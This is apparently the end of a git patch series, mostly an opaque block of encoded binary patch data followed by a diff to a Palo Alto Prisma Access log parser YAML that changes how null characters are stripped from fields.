z>&gIRc-=mp_ryY<&*SzaobcY&i4>9#ma;s)pLO;PHlr6oTgK~k>()>Ug8POt?PH{$4&M!o48YnuuEwcb*$0F ztY|3obom#DJce9zuvc9@f!{bxyFxVNGZV3pL3)?vM4n8Rr&jNQ(6q`g_}cRsYk!za zho0Im8EBqrR>+4x7k3<2?B&|SgWjUoS76sh(h3h0Mtn8Mb{6OBRr*t!dWX0e&Zfzr z{Ch25qX0COw%vVoSC+bCl7rY}Icw(O%^y1GA3 z?w0A|_i8PH2e)u!Bd`5%F{;przMK}jIo(_yZn4crPXSq>4znFp3z*XYmHrcpsSNlM-@eaJ&u5X%I#gbQ zxyUYcPS%ruCtF`y-d5IW;@o__Jd87Zp>JPflo3iKL=)T5`navBO-HunQMLs2425ES znRvEVu#*IDwc*}bPe$XT@{!K>{-S2^7$4`AwKs~{ze&oboV-)V<0VX%85(tB&CGZN zM?PMCHYiV8v(PZiuB4N#xym}Iv`WSovbkUB>;}#@K~~^`rnWw8mp{^wAv{#AUc6Oq zgo-`Gn=0Q;J;vo>T20=L-nmT1J5QpWS_s%ZA8z8~e{IyWZ!?K$`-1IxdIgP*f_z~? 
z-1uwSb4%(sj%DT~ILU7TIE)v6F*MJ-1T0j^BTGuh6K~TmwlX2Gt5PSH8D_rdO;jdLm1vU8Xfo(HGc|CG88F}^OXyq zSaXAfo7jq;r0<)^Y-lXK(gG}ny$6#d7Nu^odKf(McYzpJA5h1Jg&~ho^0$UVK`dW< zojX}^bUJ)Mf`e(qjijw6ID9;w{i46fYi9QuVTax%nPRYb(E>!jY z;2tKmpRMO+_8qSZfc|fxlVHaOZW}A-MHkG4Jz9R;l$3BOd7Xj>VV+Wu%Y&&&Xzi{P zii=I)-#?k$8TDl;v$EPRM+eFP6EZ$_Qe3nQB=k?~S>i~>RVSP`)1rLY#H*WF= znUjEI@t7BB9R(Gb{L%jC-W;;EiJVvV2=yID@o$qlKeC7k?(mxWOw@iCEPF@+JFzvj zkx91cyA*f;#%x=*-S%zIhnlbEu4L=$Rf#&gk&^*{KHM{lTJ=MzW$}z<{8V0Q(1_n8 zJ9N?Ky>!u^1+b>}7)3@tj=C4ZY-WdwuY!vm*7~!J^5Msvx=XFrG=`u9j``lQkMlma zGRU?86?TF@fF-eZ^)VAH+jk11w{_d_Sv-{Np}SvnYX4#o3ZqhcD~rSTP~7JTJF#{KYV+j_ zm0*30@apdH{y$V_~HvHOEJ?G^XEshvKIhG=l2 zu@;DM$!vMykaGG+?8_9(VULZ7P%4uH(b5! zeyqdttLI<^18M!H`2X^X-(vzUs=F5h{Z*qVHqKaArDzM_7bmqRDe(h!J710sA9|kO z)z7(vj+|YQtFycqQyn$yl5oSpyx(KwPco>0E%m_m^S2O(GAc>#xQ*fzCLj2eG99(s zrfk?-kJ$I$otv)5$7npCXnfQ8O5{$f|D&*}wGLAeLZNwGXRz%vza%1GXlXf}*GUXn zt=w$Rfhc&8{=IwBZNfRE&sp}S*tIjOxg&r;-tyrQI{7JQa|t{^=}7JYv+|^e3wO#FS%Sl!ZT@sJae+<4Na)U zo4uF-oqPs(s-_(K&`06;-Uz#QXsH!O^O2)J4HZ2S7& z)X=!|hzGYenk6SL2I3eFDk#bl%f493paYg7UcGHSbc%2%$&oPx(@zmaPqov+6w(J79^s2M8PC+i`q5|1@>WsO zUa2(W@=A}iA1j7Qr!Z?gN-`uoM=`yizq!_;a+$6rLQ)z$0sqj&^r8uDpm$N3m7}WP zcfSH@sP9zurP1IW5FT7=PL@pKs?((z{eHJe{(GXCpl$cMu+tra13m(_t50OQcNVYL zaM>Iv@o^GJ3`-7#O8c2&SQaM0!m4T;mDU^0k)BZ zV8qRlm)l9{TCDvq8YR#%(R60m6-^jz3KpNPEI69ZIoOA$6+o{jM4~O~_$;W<kES_04`j%ck^+lD$bX*N4qd1(uQhQvEJ(MFGpJIfGzcptT{$|%NPWq`JA9)t<2pP@_DQa%P z4CZ5W`U))gs)Y#)i9^)$byGlr7(j-9DYvC&8G!^$$n&4i^nK^cv!5A*50BJ9!UQ5a zoPYwb8D9AjXX;Z?rKfU>f>5g{rxfvJ3n%;6>IDlP0^vlkr8rT%+*BmzCGY)d{a+#L zYmXT91b>lC@A5|v`yb$SvD$WJ*=>#aThGfSFCT2sGES0T_Zyd7#0GuR{y!1_sb*BZ2sz!6y6p5a2_er8*v?;XLS$TE&VPE^nIz(H{)0!c ztE21)2$_K&jMDe;?1PvX1;DQ5N7x&Mm)o_onn zktQQm+$DNI47c}|ouN^~3w-#=3!wwR{uQb^xOL+;fMk#C19_a(t>C548s|Q@vYADY4E=zPf6( zDwAbkXrlun7dv7M2$B_*992KRnLetoQ(Dib7jJU4{zi$kw=V)mL=EPWql6Nrq`mx?42(L z(VbQ6ccw_gI0cSK@33q1mg+8%Ft5`Klf>NXM|p8?WnkFf#RX2`RplhSyMINO?N+(B z|DZn=uK%3^*=sN1rD)2H3HM*Uzf(?D_aK9;yo@glWyg|RdP~aiD(_ewx$lpXwCiz| 
z^>ez>Dx-mM1XU~pA{C5Rsnwck=&&AfMQjZ46`q9^Z3<3&psjNNV+ni_C@#}8n%ZS? zPxlUwfO|n1Dlo4U%81^mHcoENkE8dHOP#Rm<@W7S7pi+-Qe(lKYSUbj90dA5IF^~V zq}6h5Gv<~g0`RK3npKK{vG{eQZjOZMx7D)OiX|%c7Q>DZU@SY{$fC6-xr82hBBQjX zz$Pal4eUpj9$s4i2=h7|EKOkoT;riILEc7)aM!|U;9nFAAXaBvS(w_+#J3&6!Hx?)V$jyq9Nfkkpgd!PXxfo2B&f|4fR?$@f$r~Ty zWYeE-B=AQOlpLOXAkJ>UMa!s+SycmA8^I0{PhPaAl$J}%)6JyuxzW|Yn8rYeYb0yx+W(9j{Xr(tHyRQL0# rvE{)(dztNK<sp;yK=#9KpJuVS?U?>Af~1k3F%tlbKdKlYjKTqi#LBUSQ7it-YB z=2nOnP_{BvWyyq9C7pc`I@;0Ghz$vLI;U4$(L%H6v`q0{x5ohv5NaP~MX-cm!<^}* z%UXUJ3`h46_4o+Bm4ol6{%yJ=4d)u(io^xb$EYAX8LM4eiuM+Zp@!agFFzf7VJM9Y zB@fK;dp&2lzDEa{s~Bd^^Iz8o9ZU9YhqOC5IA%?431Z2PC$G}BdZdRTBLKrjv@&%E6R#IY zx)F$>1btB?LEGm<_Wtpl@Z(_sA1JLqr0Qk(RiD?*!AM60C|1?M`YTZM)at|w1C8_H z1G?+N#LQ546?xJJhnY2*yf7PX`@3Q2Wx)_)z~}2%`>?CSBC4w^@3)=dIYWy7VEEgS z4Ig+XUDS@-4!Pad4GVunm`TvwZi6oYS+#kLJIt_}Lr84o0C5xNPe!oW)AV_ahT06* zjq0)%aF>ucKPN9tNqbj}(ftjbZR)d)ynEcQQM8_8wx0ctzoRY(6r}!Kat*rsnTFOH z41?NP9ha4E%pYVi4RL4t;(OQc$eK8^3~f`qznfA<<)_QdSlml?e#T6aTm_;4_?*$z zTjT5ht?bUORqR8h(Vuv(?e$x9EzJ5ZGq8%OGzq-{^miGf{#d*%aQMeQPp`0Y?a_5< zlbQP1w}%O{kzNn`yRiuYrM9@`|1MbiNsx+9&^v5=BAOZot0B9ypjH@-rtwo?}+FwtL-sSdE{H!Ueg*M||_ALxk2gWc6^zR=vMtaKI9vtNsJ!D%M!AVc) zCo3WND33iQCCGR_m-KC2Nd^Oe&Pbr%it3sf`ZAn*A}1m8T57f?c7Qfm_H$TYZTTw@ zXMz|v1R%XF{WhM;go!pTx+XFYU;=BAbJ62p!98bc1-qMU#1ST$0 zm`_IG7V|nuNM`HVRdwv)QG*i|HU>Ppuz2812DUp0$gY}9^N)XmFU{O18?g?($}ow) zZxP37ihbklnF@(BrNyAJ=U!zUt;!_UVz^AbM%b`uaLU8RxZ{ve;B&owkC@T$n=YUx|$B9oQcy!%M)X;|*>OCxp2Af*>&T6{)`mVOyxRtQE(R6%2L z)8=qhF-m>Ts8j%8KZ!i*o4XGAHgWhtCU~CdZSmyZX%kD-|7JO77!1fE^ak$jP)t@3 zUQGr_zTDAlVcjT?T>2u&EDD1Rm)^6Y1K-bD7lah>~i@VCy8m}=qGrv#knaf%(&k0EcfJMV}wJAYk5rg4sC4HgqLR82Xy{C z?53;DoPWx}J7S-pjRAd)gv8OlxkusQl14{=0%W4AGZp8Rp3wE3VWLbAnP=g0QGb;S zeC4EW#(VyW;7~N7qDy&m&O5{-Y;Guw?;0sYX+#7Q_lSUIMvU=-1$-?W6?2Xu7miZg z$Cli2%4o`N8VadcJl{e-A#-HQcJmD1t@E_v(aO^>uY3Dsy*Zw2)<3b+mwB{;$Aj2< zxy0f_s0$vvvJMfO=Kbi`Rhj+X6qjZ_A?rUTcLMl-%5TwzglK9kCK+vT5qkqeXe6sV z_#8akp1ybYmdCyXf}@Tu2ShNzr1FZ?WF#2+W)bt4lh2?o7B@ 
zCE6L6Dsz|q2%+lFF1(V1MVXfi7JcbZhOqpbXk6DjuHJG{?h&GlNVDJhZ50J~O`aDo z&s9fur)XZB5$8TiIPl6`I^%ko71TlmZ(Y~`{o3ptIse%^+``}F!}I%O{@-LD^Q4Pn zXx?Gum38zT9dBKHt`Wu<*i$J!yv0fg!Xn?$34(GHp~gxVF%xs!dyo8!7(ekn>$_UY z99Wvu;{h=j{$*3Z(6D}0F4#95Y}273v~+kb4!)7#CA#z70E7)i2ImzEaBc)LcNY0uk6kUGSX85*7WFkhZ^ zZoz`%`~ySz7gfo`O8X8SDV4URJJ;qZFx}B+C^08CG^v7`=vls}U+hr{xHlc6%faeL zJ{l4x=0KaimFKtcL@4U^%4V^U$QxRcml$juHVW5vq0=mfsS4oPkj(|gph#dUM~Do2soDy0py2;Y^ zI%!15>8lbii&q{nh9c>C-a8 zPDt>XDC68lohpbkY@siSC2OCb)vk0Ajx<942J_jwt*XgK9Jxy;oOC2Oeg&gfDrKDB z=##s+bEt4tz}xU<$)X~*vunZxtjo2q>clN6W{NEtuno~mjacv)#)wT%l$!3^{Y1N2 zgrYZ0L=@!lwib9MDZ|}TIo!mgVh9Vp@7sC*o78OJity2WVnHwB9Vo*sCIwlZ0!1_Hi%_`8T#G#4ss`Q44dlC>V84* zb@U!g@vt;lU-NgUmHfDKMa$3HnJ%eFV2^8Ei8P&kdvEM-G2Scp6!j1bExrE{4UVUe z?i@@W0K^G%Dg88_o4uX;Rzp}+(WRF2lRda1w#-pgDa8bm&jP%dQ)R%a3SrV>J|^#U zOP5dFm7U-+)owa;f5EK_cMcGEK_&F(83-o%x)NarKqhWNt%ZB}oJbYCs9Rcfu6;l1 zT*wbuS~mS*9?z$Vyh7})5ZSsGNt&)9>Bopjvz?@Duw(di8Y%6yQFEH~FV%v6K7dTz zmq+NDUyUK1po|p%2J>lGIqcQJKFhRC*~QZKbt4l5a7IX}k{8^Y(}7)G(|fN$vwzV= zdc5KPWQSEA_A71^Rk$!df(+S3aHdP+x#fH+{>2syiDgSybc}Ugf|~xY=kO>zIi{;T zJ(@8=K5Itfbk6*fBY|g?@~p=8mwpW66^5Ad3*!%eW9G>nC7@cP|4HA;TB!eu+n&+f zMqwSJR__qQsFpHHZS_&`(m{|nDe>OwVYU00e&595VqGK2wY_&i(E4t5#TncQJQfmW zd=GqwZnN8qq-(5>wbrG+Q)>e6m!pr?xP}@iRW<8urQ@d`&o?S6g47ebccYa*^%XI` z)34e_k$!pnXK-8!q>E#xPj@>g%Kiw_$XMLV-aaC-en|9?QR%+foLY?K4w~*dXhEdu zEa-*HP2D=h1@82q-=D%B#NMmdaQnJC$v%BVDrtHHL4AjR_Enynk8s+bz#Gsn+K`&h zhS`l)OsY{A0C<~#RV>xrR&o}~9c3y>sT;cW+rc7iZ5d959MU;d)ndYRDqhC_b!kpw zY~fgD)|<-%wuy}0jA4R*hPm4ORW?4S!>kESaG{+VxoZgRSNjFBW^gR}VStB;`3p4- zZ{L@#zOJt4*6~eP9XSjk`j^0mxJNXNVLxd?H!r}C4SSP(CZd-n)mMm7KoI`qNN^B^ zaD7(+1H+>FVw8DXvq};vV1Gqa&k?og==iU%-`Ssg z$`2~Cp1FSgNjyP5lY?!_{fpg4?)&)8Sbm#6+t691dq3(X-|cEsqwDxLyC7#dOpy;#W83&#oLd$HP*64g}V3u5{LC9w;M-mRx zwbfa;Mnx|z>=ftjR%lN?7M<~lvFe@>nTE%)l+?()4EuShd*F3g*}s<{em^}B)8G_> zz1Yb6Dw(Qib)&T^^I#C^G0{%onc!TpZrJV$N|EA)sxj_NBWK$u=8!`cw*sLG(dx~-1lg7PvQL2s=xV}VCISRduPMU)bidBl93`Tf?)6UYLZTHx#aAwKL 
z|5irOthPHeEsiS+c;w}-_v=-IF$r+J{6+lZ@p}f|<$hX~?Ay$pWfvNX`+dd^#4F9q z9;`dN!@_^f^U1bNh=e>`BaUYHQ8j6go2IMTrOj@sFjCs7(fqru&bfU^dDf7mtvf&c zmRU!S&+5Vp=@xjW>}t$IgsB32$-tY%Ot=H=;>NNTn`pa_{(5y2kjh8d>XRW7%#62J zbq2o_smtv16qrKpHrY~(O%XWQ&;(61co$V<;%q=+av2U;u9Ow+y}_{(9Nc974} zf)xQJF(<9UUrs;%B8B~fC&b!Ib&3Qk>52|Kc+Z=#0?I<<{uS*ho1rNGA#|N3<<}bu zeEYsV(5swl+-3q)QjF8MQWWMoI8yJEiCTb!8DGF?-?}8T^*Lty>nHD0>$Y_Z$+dA{ zI>@<%dEEB|vEeg0ZuC2gohY7eOK&R*5gnZzyrpDKUV^8UF zO@sQ6RzCS)0I=#J%MXQtwm}q7?s9tk)?x;lVnsr(qJx9W6lq>;f4igJyNxV=am6q% zZ;xqN_Ip+18YkhAyhieUzm`I_=Es4kypj+;4=0z^AyeGAB6U{E3~e~8Z9b}hTU{R4 zM7Topc-k(j%=z_9hni2JNzg0gk@(;Ck#`;FQ&1MAUJ?Eu^o2s)XbTFFzS%DX?f}^sN55U?m z_cnJ#(ylH`0{(m;(C`>P8!Y&HoK834o>BL)WfXqYK})tLnfFz1RY>oV?ff6frEQ*1 z4X4Amn!B0Dve!lu?VE3ujF!idJf`;{_L{o{WdY=k^bqp~{ADZzRq zZ3f96~_rYvq2+ZH`4&@ z(Pnv6S5Vo;St2R9J(jJ8K-RYe0&by{fMDJ?_07V=eX5R>7{QaI%Tpvx@nEN_!Z;k~ z)wJ{eAW6IWcTwJgr1=>iFFDFY*aauNaW?$0WTxp)JwOO)d@3&SEr-sNq9TaK8`~dN z!q&TW0(`km``w>LeWkCNc=b^OghUT%=vA-}@Y`#(cj&Bv7McZHsy}zsDo9G+=dc$TR^r$lgu|kwY)YS53jn%p+1p#B-E`y|u!}ixuLjIE zWud(FmD@xU&5N8eM>?HVZOWeaD%9N=PwLv}M`1%E3ZM-p`g>0YdpQ50c|Ad7kAA9DKXo5#(X^!ar)Qu;^RHE*k z^Otoj)Mv%lqO_a38&;V>Awi)yx}sa%N%ZlJ5zcr@EI*y*4fgl>P7E?lx^5~2 zW{2&+FW7cik|A!2-+cc0`3bbg*#P}h_B;@kD67#b63ki_a`;efTO4p`~=$! 
zapLx;t0P-FYc`Wcuk?}I`J#p;k>2zUA~?fE1*N_(AnV2nylF3Ppc7X|!3(7I{=~6c z(e_dzvvqi53X?L<_FKOi5#h6RT|%5iFyH2Yj$6q^@bV4P{L=Jv;Oh7O(Y!SZ5E z_HTyzgxktSx_ZvjRXo!|Lw?P|eeH3g^?b;iFMP6+{BDQW6%#k$8<#wg7fEK&#i`X3 zA9XSxUqDKz`{`0Hx78rbkeLkE;(Yyr>mV$^*>m&WBQ|v4cj0TkR-g;%++5`8(&N;o zi)n$Vp+E=Y*hRY)>ip9ya$Gz-_}6Gr8E8?mM_{v~(T3uXROH@5ixdSFMCcv&;h~43 zS;n&uv}D-)?fe63562g=xxUH(IlG%n)&~V^bODp1FjLu?62wAy^a)+i?3u|ko(F>3 z0!g4DHX|Kx&Qb{WpFwC-)~S)3SGx(KU-fkse$v*iE>4dF=W@p%QP88kLN~#cb##aV zAwJ(fq68L}=9{Pe@0V8v0<`1oAjtw8Xf3eU8b$d9iRhZsFoJKJozQ;tScKjT3vYry# z(~8EjCzMb8;%f`$axu{OzDoOC874yxY_0mXgQY07XR8E4k`DJxFQ>=^GMS=>{C7C` zdJ-xIZpRZb#V7ztZ!f``8AI={>|C6BaNvIvJ(b}xks88=sfXueh;^X9%?%(d4N<(_ zzueY#>lT6U43_?0xoXcw8~wAQnUpRs#<-)T=b^x3&^A^ByxvdCF9z?EH#~&fiqg=c zZ@ityEKgX>ei$D~=A^1Ki7h2tLJwd1fcB6iGWzm;=<$Zz9YPxy5m(|*NFAc}C>HU( z(BEr*CrJ($)%|@`R~QIMKhpPWzp7Zgjm7-MKgX0Q1V*_gur>1=lq?5w@j#8h2lkv# zER3968@a)@N+Bnso~eQnfc_UMx>GMt^-De8tol<@FQ{8T&OaqjLM2Z}6X17>k2C0z zCFd(OX^UNq(!QWk$`Hb_Jga2|D z_xYkujFti^pf^?}PwEp`Pw&eYP$JW9rP0C1_g+=Pmn+mD4By^Mw1bPov z*Wca+OZo9{VctUTiqsdLnLvU@m+7xRc6*)zmtE`CsjG60(}+Ab-1xerG=Y5E79g|| z8GKVW_w}*rwpQoMMsnDNRb3*k)_hl)e{rmCgqFi{9;<)+=A1E12+UuCTa zUffa7YuBir*z8&6d$vn-r&N?LY@~!m@wxhuVY0Nn*h!|Lg!{f`9BnIDS$vtVLJsQ;?Nv zUPqCorAhfu;sD?5Pg1_CgzMPz6smx{cm)M~Wa@YZrgDGy2gmWj^)ojqJOcH)cKGxn z>BO529lMx@^hyisTjibHd+^4;)zZk1O`{8xaNH5{<15j?*O=@l8GI$)ZYPHIUTd&XZR@EN`0_?f_Ax5E3+6A&wDpmudYN>uzxYsK1s6qViEo^!+kcJL zN&YjOZi?QsD}VP2j;g`^`{qTss*wc}`sUUV)F%7$~}IPNjl*Rjbm z^0)TtZcnb-Nb1@VA{j(}`Z=UnE_IUNpbnfUdXk}<6OD8iS8ZhcC|cfLY-TdV#ht|` zc2n-S^?S?MNPrjCkx!kNq0;6APE*AW9-AHW{lhPZsU0nW+gW?FfV-n!>yeNpLni+^ zZTPPVXZ)7-LR+2GKnc}F&rCzYwU_!S39*#k#G#!Ei0M-Ss?^_C^?@|r{dq%}9o7me zJ{%T(^k`BHsJ?u5Q(p@y8l=}a%PWYI{+c(srrPPiSOWqC-ILMJL6j^*d$0NAA04rG zQ!gsr3@#Q#>`7P#ml(J`KRAG3*ku9yc0-_^5G=n`dU#8mML<12D$Qks{U}a#Z)-av z#H(B^!Bx%{ddY$2(j=oX#&61c>27B{-8)v_Dy##d(DpsYV;To* z-blXgVYD|$%xTY^Bk)I88T3`+S4@9erTgyZ1w}acj^!IJoe81JTdxh5RM)^v`N`0< z3!&Dkd!rhor63)jL(e#^y`5*K(12LW-Uh4sAipu>`R~@I-&HMbHb;@VAWtv}x=y-x 
z5^f%7^1Ge(RYU(CxK5OChy#{MNs+rg?s^y{{sqR4wEvf+L)U0DlGaSNaq0`-K=c*e z(&S%evOm2vR<$0bV{gW?;BjW4SWdKme9`i(E$aHoZTDd~@uZw8f)Xoxp?Y6s%(-es zmey6|87^3cg);ALVhuF+=o)`CnVc_aGSiyp4O?Z7vt{Pb3=mN~R6_fvdzqoUCpbcm z>knH67c66{U9*Q>mmvdt7;CnP7^OZ9d*ZKyB6JzhD4J4DAK%MCW+pS26LC#MpKO5< z?kW8u__^s1%kXt3K6Xcw?`lh*wTGD8wDrxHhqGG*5uqV!C7yF*XmaoaLp+uY+Odh9bJHXgfC?}MjWbS!zt7cWS}lji zTk6v)-cnyH;oqXl71TF{Fs!ThWulijnaFEjh&9+bvq*4O&I~{>#PO_kznVS!-dAtN z9Y3h0d_ogwif>x)q%>9e*X{Du{UcYbFdr?gcG?i0Blrq%SX?7c<`FHLvgA77pU7K| zCea36^PlbXDJ+=rtDL3v1pt*Rx0oFTSN5j}fj07$>La6hDTDL4gxMBI+5(SOBGTwx!W2%1QR zUHcZg^4`DI0qc2gE|htHtLDCgzhdcz8pw1383>YKazTNrChlu;*POSczj`Y(kkv)m zCPrz8(B6LN91-ZO4mwT6X0=;duns-3y}w8v0~z0t>=e$5hMOtzKER4fP#WTo`FWN+ z4%S_a99#VZKw~?9D;qAz`g$REs3#W=ZB_>7mo-oh8L^L+ne4xy8`*w`ol6LIy+bvt zBiKN77!798We5xztgnFYhM4YAzr+YSml z*)`lMqQQBK{M7p^Gh-ZBH>lmFTh&F?t1}JHk*VTq6fCjBLs4*W0v#VzzkqW@SoSpm zr~CKpB`=jDW_Tr6NffU2@BF9nO6t`u)3PGYGGn&kH>79e9H_o`oT2NMsi{GQy2P%k zkn!}C-W~=>A<15}G|e~tg|uNU9kFiC(E?DWSUdmHGeOjt0~qtYcXKuyjx@lBEf(b=Q~GuWyDh7k`$QqfMvFl$5msmMmtSJ!r{3ZIUZVzMtu&yu?!BuTE!`DK zVK_YBG(BFy;;Tx#vcOoafyPq}Mo};IZrFrm*g_@gFFE3T4G1;H<;`;t41i!ETU{HR z&bbBQobKufZ|8^>jw{33LAO?a10N}Z-V5B6{6&U$v;cQrzG72jp@P-ar4I$jlXEHA zT|Q1O6@|!a2A%TD5x22+x%J$X@;~df47Y$3V-Yg4=3M|Ot1io`EH5Y=k^UqVjSuWY zDr^yS0f?#!NqIJ$7}z_hIT7?HfwrL!NSkq#2bCIu|16R~zSC77ECVE>zx7T#8=2##g z(}o#Dl4#(OVGKeT6Ga#+;}S}O8J?9!#vLT^rhxw#&Y73K*kqu}YCA~^o$q!^>OLFP z#Fn+HxxJ1KTmJgHN+C3$WHvZdH=hTk|E;zYD6x)^q^q@=zqCuO3ehUha@h6fDGCUDDuTQ#G^t12 zn>Q&BR(y%Fq~uN3OWM^I6ejY?4*>PcUmG8E>$kVrXnj+}BM6v`equjmXP3ID*AmhUCsPOv>%@$KWfpKRS9gB^S>sWw}}j;X9k*L1}c6G6%^XM+!;vl zB{`(`4^+Bq9t_WBlO}3z<39OFB~wX&e@#^P`>v!^vuZ8uS8ODrR%gWN_Y-Bkj$-I{ z&0e7xMij`NVDlG~Em|-0CE_aX8&E)pN5dNUwd?+=p-+)44a{ir3+V24Hj1dA!N%dp zCjY@yb6{E(zSePqXkEihs+_$O=VihwMi zHw9XZ5;_s(`5Nn+{HH{OuYarTlqK5QX+$I}Nbqp9c&&qK8YIR4-G$Lbvg?aQky%2& zgT!08>&QiIB+B}xQgRkdHRU<%!HjD`=gN&>O(E{lkPKG|XR+*-BaD) z&9*0K(rHB`$!$}f^y`qkggmU?2tONT;+=MB0tcxCR-CO0D92uAmgHKr~ 
zc~A1~X>zg;sfXioSFczbEIQ{6TPiIlxsv-2N`=HrT&qbt32sdri>o6Qc6@{kJp=Yn>NGdh;ltxDGD&I|U#~ z%4mk)&`S+PnW5um$AqO?CaJ+)ZS$kJR);R6&T}FTbJvHjL)fgkW;e=J=M~%_^KZlT zIPF&n$sDWbyEzn=PIf2&*+gj#l>O9=r#d1kw`XF@boYyEK9f|d!xzLmSa0FsAb}v+ z#D-LZ316akGF4DtAy!bV6Ozt%`%U@GKm+Ap(U@l8UFtI_*+jCtRw{o3JdA2_xYxT< zd++77X*;UR140sSQfyBgl%R_4O9q9<{(mfc%*E%5R}rZw^-R?-?|lx|15za+TX#of%fSlNndA9vk3p?M|6ucz9h4C==NG$ zzh;dsM~Vpiz>0lO?7xND4L&nLCD-$xZ;H~~!K=vin1kmyc-`zWC!BF)U)08B6Hjov z{20P9>Xwa6v{=ma@TUoe$0FbRX%7KPrTLmdmFz>i$7i zyv*_@J-ek7m+4OwoS##u7jRS6GwOU#bSo!)F*K>fAAHPUSEmuDhx)k_`9gWyOC^pB zFT2D~SL|+{B&eq5%FS}@nj>-r@c&0M1vp?4}F@J zvbr*JK^{$Qz3nKkDal#fHbCDE1sgT-FKAY@J~J1R9?vu~c2{sEcvYKwkK-S(g)i_B z2i9&os(9#GY*=VI@s%sLlfpr@--_&UiVvuBHp^T?!n@5N`pO70%;V8(kGB~pQ#A3B zqVBdF*~}e{?jf|6P(h}{#*2Z{P}v?c?v0=i?lD6Yr=y>E2!LMe@Rr%)0LITsXAu_@ zJ1%LMCmg$IrRf<1f9I!X`jkX~WVOpiS_~s6r6YXuccpxXmo#2bLqf}M(~GGvNjQ@N ziYgENp;#hKgMEBl2q zKZa@WsUHycE%=6k1}u4-0!7^n_DHiu0+q81pD;f&%^%a;oU{xlMnXtrtCx0I)uVkR z2a#1+*u64a12#)uOcDXKcMqAzjt52ujsB*DPgtz^qX=2;LW++~^ta$!+fNTZRgl&w z^i(l^oIbrba*xPRL#tod7N`I7a~$DUz~wil1`Z+f9@%S0--_~r`?@ue4T7K)z%bAvlX6s=FDr53$I7tYFRT(HE z=)_Kgw>mmOSk0(E5Gx`RKV+x_nuHqh;!H4!jTY<{edrgDAUf&?c;PZ!Fi;QkikKk8 zzoFuQ++3zv1K=eV**iJjYRgV^t1g}K>Dz!>-kW{P#9_-Tfx}s%uU{i2)9}4oxbH#Nn}ytKY3)>S*W5-ncj3~S-vZL@3CGTEzqA|byvW-YwH49t4)I7yh`=_TToZvUnD zLORy7xd89v);U^B^oRu8e+y;^&Q?^iX{`RkB;q^Rp{*Q}HA}7#)-}$Lq|>T^O}PqL z*&Lso66Ve+>>(oPw_j@`nGMy!yh4xgjRdaY6#{SMwUyFBv$`6}*kO>c3hSNCR&=nR zfjKRf;o7ejU2Kq~3W!R%28|iA$tTf;;m`kb(dt^`Q*On($-Vf>KbgBsZ>rwkX}YZX zjrtI-3RlsutIWwO)&%8re8jveSJ{m(W@0U@7!)xXkF olX42peHh}w`TzHUls`*73~=%XEFEkk-W>ucDX7cW$(l$0AMxvZDgXcg From 11cab3ea5b453df67ca630a64382d1055f907e7f Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 16 Oct 2024 16:50:39 +0200 Subject: [PATCH 156/317] fix(PaloAlto): fix nul character in the parser --- .../paloalto-prisma-access/ingest/parser.yml | 90 +++++++++---------- 1 file changed, 45 insertions(+), 45 deletions(-) 
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 970bde48f..113ef7fdb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
@@ -714,51 +714,51 @@ stages:
 user_agent.os.name: "{{parsed_event.message.ClientOS}}"
 user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}"
 user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}"
- paloalto.ContentType: "{{parsed_event.message.ContentType | replace('\x00', '')}}"
- paloalto.DGHierarchyLevel1: "{{parsed_event.message.DGHierarchyLevel1 | replace('\x00', '')}}"
- paloalto.DGHierarchyLevel2: "{{parsed_event.message.DGHierarchyLevel2 | replace('\x00', '')}}"
- paloalto.DGHierarchyLevel3: "{{parsed_event.message.DGHierarchyLevel3 | replace('\x00', '')}}"
- paloalto.DGHierarchyLevel4: "{{parsed_event.message.DGHierarchyLevel4 | replace('\x00', '')}}"
- paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack | replace('\x00', '')}}"
- paloalto.EventID: "{{parsed_event.message.EventID | replace('\x00', '')}}"
- paloalto.PanOSContainerName: "{{parsed_event.message.PanOSContainerName | replace('\x00', '')}}"
- paloalto.PanOSContainerNameSpace: "{{parsed_event.message.PanOSContainerNameSpace | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceCategory: "{{parsed_event.message.PanOSDestinationDeviceCategory | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceHost: "{{parsed_event.message.PanOSDestinationDeviceHost | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceMac: "{{parsed_event.message.PanOSDestinationDeviceMac | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceModel: "{{parsed_event.message.PanOSDestinationDeviceModel | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceOSFamily: "{{parsed_event.message.PanOSDestinationDeviceOSFamily | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceOSVersion: "{{parsed_event.message.PanOSDestinationDeviceOSVersion | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceProfile: "{{parsed_event.message.PanOSDestinationDeviceProfile | replace('\x00', '')}}"
- paloalto.PanOSDestinationDeviceVendor: "{{parsed_event.message.PanOSDestinationDeviceVendor | replace('\x00', '')}}"
- paloalto.PanOSDestinationEDL: "{{parsed_event.message.PanOSDestinationEDL | replace('\x00', '')}}"
- paloalto.PanOSDestinationUUID: "{{parsed_event.message.PanOSDestinationUUID | replace('\x00', '')}}"
- paloalto.PanOSEndpointSerialNumber: "{{parsed_event.message.PanOSEndpointSerialNumber | replace('\x00', '')}}"
- paloalto.PanOSGPHostID: "{{parsed_event.message.PanOSGPHostID | replace('\x00', '')}}"
- paloalto.PanOSHASessionOwner: "{{parsed_event.message.PanOSHASessionOwner | replace('\x00', '')}}"
- paloalto.PanOSQuarantineReason: "{{parsed_event.message.PanOSQuarantineReason | replace('\x00', '')}}"
- paloalto.PanOSSDWANCluster: "{{parsed_event.message.PanOSSDWANCluster | replace('\x00', '')}}"
- paloalto.PanOSSDWANClusterType: "{{parsed_event.message.PanOSSDWANClusterType | replace('\x00', '')}}"
- paloalto.PanOSSDWANDeviceType: "{{parsed_event.message.PanOSSDWANDeviceType | replace('\x00', '')}}"
- paloalto.PanOSSDWANPolicyName: "{{parsed_event.message.PanOSSDWANPolicyName | replace('\x00', '')}}"
